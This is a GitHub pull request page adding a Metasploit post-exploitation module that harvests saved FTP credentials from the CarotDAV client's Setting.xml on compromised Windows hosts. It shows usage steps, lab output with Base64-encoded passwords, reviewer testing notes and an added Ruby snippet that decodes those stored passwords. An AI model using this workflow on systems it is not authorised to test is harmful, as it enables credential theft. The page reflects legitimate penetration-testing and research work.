Add CarotDAV FTP PackRat module #19173

Merged
4 commits merged into from May 17, 2024

Conversation

The-Pink-Panther
Contributor

As a part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the CarotDAV FTP Client. https://rei.to/carotdav_en.html

Currently, passwords extracted by the module are still encoded with base64.

This pull request will add two files:

  1. modules/post/windows/gather/credentials/carotdav_ftp.rb
  2. documentation/modules/post/windows/gather/credentials/carotdav_ftp.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/carotdav_ftp
  4. Set SESSION 1
  5. run

Scenario

Using CarotDAV FTP v1.16.3 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/carotdav_ftp) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Carotdav's Setting file found
[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
[*] Carotdav Setting.xml downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml

[+] <Name>TheTestBed</Name>
[+] <Name>Aperture Testing Laboratories</Name>
[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
[+] <UserName>TestBed\TheTester</UserName>
[+] <UserName>TestBed\TheBackupTester</UserName>
[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
[*] PackRat credential sweep Completed
[*] Post module execution completed
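
An added example (not code from this PR or from PackRat): the `<Password>` value shown in the output above decodes as Base64 over UTF-16LE text, so anyone who can read Setting.xml recovers it without a key. The sketch below audits a Setting.xml-style fragment for such recoverable entries; the `<Connection>` wrapper, the second entry's invalid password and the function names are assumptions made for the example.

```ruby
# Constructed sample. Element names and the first entry's values come from the
# module output on this page; the <Connection> wrapper and the second entry's
# password are assumptions for the example, not the real Setting.xml schema.
SAMPLE_SETTING = <<~'XML'
  <Connection>
    <Name>TheTestBed</Name>
    <TargetUri>ftp://10.0.0.2/</TargetUri>
    <UserName>TestBed\TheTester</UserName>
    <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
  </Connection>
  <Connection>
    <Name>Aperture Testing Laboratories</Name>
    <TargetUri>ftp://10.0.0.3/</TargetUri>
    <UserName>TestBed\TheBackupTester</UserName>
    <Password>not-base64!</Password>
  </Connection>
XML

# Returns the stored password as UTF-8 text, or nil when the value is not
# strict Base64 wrapping valid UTF-16LE (e.g. an encrypted or corrupted field).
def decode_stored_password(value)
  raw = value.unpack1('m0') # 'm0' = strict RFC 4648 Base64, raises on bad input
  return nil if raw.empty? || raw.bytesize.odd?

  text = raw.force_encoding(Encoding::UTF_16LE)
  text.valid_encoding? ? text.encode(Encoding::UTF_8) : nil
rescue ArgumentError, EncodingError
  nil
end

# One row per saved connection; reports whether the password is recoverable
# without a key and its length, never the clear text itself.
def audit_setting(xml)
  xml.scan(%r{<Connection>(.*?)</Connection>}m).map do |(body)|
    field = ->(tag) { body[%r{<#{tag}>(.*?)</#{tag}>}m, 1] }
    clear = decode_stored_password(field.call('Password').to_s)
    { name: field.call('Name'), target: field.call('TargetUri'),
      user: field.call('UserName'), recoverable: !clear.nil?,
      password_length: clear&.length }
  end
end

audit_setting(SAMPLE_SETTING).each { |row| puts row } if __FILE__ == $PROGRAM_NAME
```

A row with `recoverable: true` means the saved credential should be treated as exposed to any process or user able to read the profile directory.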

@The-Pink-Panther The-Pink-Panther marked this pull request as ready for review May 9, 2024 11:51
The-Pink-Panther and others added 3 commits May 15, 2024 14:51
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@bwatters-r7 bwatters-r7 self-assigned this May 15, 2024
@bwatters-r7
Contributor

@The-Pink-Panther the link for the software appears dead to me? Is that new, or is it a security protection on my end?

@The-Pink-Panther
Contributor Author

The-Pink-Panther commented May 16, 2024

> @The-Pink-Panther the link for the software appears dead to me? Is that new, or is it a security protection on my end?

I believe it's security protection on your end. I just checked on my test VM, and I can visit the link. The AV on my actual machine blocks the link as well.

@bwatters-r7
Contributor

OK; thank you. I'll find a work-around!

@bwatters-r7
Contributor

One more question. I was able to get to the website and download the installer. When I install it, I get the following error message:
image

I've installed the earliest dotnet framework I could find- 2.1 I believe, along with a modern release. I'm still getting this error. What version did you install, and where did you find it?

Also, based on this and some reading, support for this product ended in 2006?

@The-Pink-Panther
Contributor Author

> One more question. I was able to get to the website and download the installer. When I install it, I get the following error message: image
>
> I've installed the earliest dotnet framework I could find- 2.1 I believe, along with a modern release. I'm still getting this error. What version did you install, and where did you find it?
>
> Also, based on this and some reading, support for this product ended in 2006?

Hmm, that's odd. I downloaded version 1.16.3 from http://rei.to/carotdav_en.html#download.
According to the about information, it uses a version of .NET4.0

[image: carotday 1 16 3 about]

@bwatters-r7
Contributor

Huh; I went to the site and downloaded the last one on the list. Let me double check.

@bwatters-r7
Contributor

msf6 post(windows/gather/credentials/carotdav_ftp) > show options

Module options (post/windows/gather/credentials/carotdav_ftp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/carotdav_ftp) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Carotdav's base folder found
[*] Found the folder containing specified artifact for Setting.
[-] Carotdav's Setting not found in msfuser's user directory

[-] Skipping Setting since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/carotdav_ftp) > 

@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in f8c69e4 May 17, 2024
@bwatters-r7
Contributor

Release Notes

This adds a gather module leveraging Packrat targeting CarotDAV FTP client.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024